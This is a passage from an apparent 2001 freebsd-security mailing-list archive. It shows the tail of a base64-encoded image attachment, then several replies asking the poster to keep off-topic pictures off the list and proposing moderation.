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
6n3A4RlfG8X3QjGTajeVHIA0VY2//9k=

--------------Boundary-00=_F2GW9TRAE923RF8QCLEP--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 18:19:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pogo.caustic.org (caustic.org [64.163.147.186])
	by hub.freebsd.org (Postfix) with ESMTP id 6B19B37B417
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 18:19:29 -0800 (PST)
Received: from localhost (jan@localhost)
	by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id fB62JOb12081;
	Wed, 5 Dec 2001 18:19:24 -0800 (PST)
	(envelope-from jan@caustic.org)
Date: Wed, 5 Dec 2001 18:19:24 -0800 (PST)
From: "f.johan.beisser" <jan@caustic.org>
X-X-Sender:  <jan@localhost>
To: Chris Thomas <resopmok@gramsc1.dyndns.org>
Cc: <freebsd-security@freebsd.org>
Subject: Re: the best edited picture ever
In-Reply-To: <200112060156.fB61uuFp015583@gramsc1.dyndns.org>
Message-ID: <20011205181818.H16958-100000@localhost>
X-Ignore: This statement isn't supposed to be read by you
X-TO-THE-FBI-CIA-AND-NSA: HI! HOW YA DOIN?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, 5 Dec 2001, Chris Thomas wrote:

> muahahahahaha

this is really not the correct forum for this. please do not post off
topic messages to this mailing list, or, for that matter, irrelevant
attachments.

thank you.

-------/ f. johan beisser /--------------------------------------+
  http://caustic.org/~jan                      jan@caustic.org
    "John Ashcroft is really just the reanimated corpse
         of J. Edgar Hoover." -- Tim Triche


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 18:28:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from out4.mx.nwbl.wi.voyager.net (out4.mx.nwbl.wi.voyager.net [169.207.1.77])
	by hub.freebsd.org (Postfix) with ESMTP id B1EBC37B405
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 18:28:36 -0800 (PST)
Received: from shell.core.com (IDENT:2525@shell.voyager.net [169.207.1.89])
	by out4.mx.nwbl.wi.voyager.net (8.11.1/8.11.1) with ESMTP id fB62SZ636749;
	Wed, 5 Dec 2001 20:28:35 -0600 (CST)
Received: from localhost (jslivko@localhost)
	by shell.core.com (8.11.6/8.11.6/1.3) with ESMTP id fB62SZF12811;
	Wed, 5 Dec 2001 20:28:35 -0600 (CST)
X-Authentication-Warning: shell.core.com: jslivko owned process doing -bs
Date: Wed, 5 Dec 2001 20:28:29 -0600 (CST)
From: "Jonathan M. Slivko" <jslivko@core.com>
To: "f.johan.beisser" <jan@caustic.org>
Cc: Chris Thomas <resopmok@gramsc1.dyndns.org>,
	<freebsd-security@FreeBSD.ORG>
Subject: Re: the best edited picture ever
In-Reply-To: <20011205181818.H16958-100000@localhost>
Message-ID: <Pine.GSO.4.33L2.0112052028080.12775-100000@shell.core.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Wed, 5 Dec 2001, f.johan.beisser wrote:

> On Wed, 5 Dec 2001, Chris Thomas wrote:
>
> > muahahahahaha
>
> this is really not the correct forum for this. please do not post off
> topic messages to this mailing list, or, for that matter, irrelevant
> attachments.
>
> thank you.
>
> -------/ f. johan beisser /--------------------------------------+
>   http://caustic.org/~jan                      jan@caustic.org
>     "John Ashcroft is really just the reanimated corpse
>          of J. Edgar Hoover." -- Tim Triche
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
>
Especially in the wake of the latest screensaver virus.
- -- Jonathan

___________________________________________________________
Jonathan M. Slivko                         jslivko@core.com
Owner, Voyager Internet Services           www.voyageri.net
    IRC Server Co-Administrator, AsylumNet IRC Networks
- -----------------------------------------------------------
  FreeBSD: The Power to Serve! (http://www.freebsd.org)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (SunOS)
Comment: Made with pgp4pine 1.75-6

iD8DBQE8DtfS0r0T9plv2LkRAt2gAKDfyiOp9sfX/+Z8kAL2vNANBLdtlwCg+u6/
wcBB/+mhhbSrNST+C4+sK9U=
=tCLq
-----END PGP SIGNATURE-----


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 18:42:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57])
	by hub.freebsd.org (Postfix) with ESMTP id 140FB37B405
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 18:42:15 -0800 (PST)
Received: from fpsn.net (control.fpsn.net [63.224.69.60])
	(authenticated)
	by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id fB62g9o02921
	for <freebsd-security@FreeBSD.ORG>; Wed, 5 Dec 2001 19:42:09 -0700 (MST)
Message-ID: <3C0EDAF2.9C9B5E06@fpsn.net>
Date: Wed, 05 Dec 2001 19:41:54 -0700
From: Colin Faber <cfaber@fpsn.net>
Organization: fpsn.net, Inc.
X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: (WOT) Re: the best edited picture ever
References: <Pine.GSO.4.33L2.0112052028080.12775-100000@shell.core.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Another reason to moderate this list.


"Jonathan M. Slivko" wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Wed, 5 Dec 2001, f.johan.beisser wrote:
> 
> > On Wed, 5 Dec 2001, Chris Thomas wrote:
> >
> > > muahahahahaha
> >
> > this is really not the correct forum for this. please do not post off
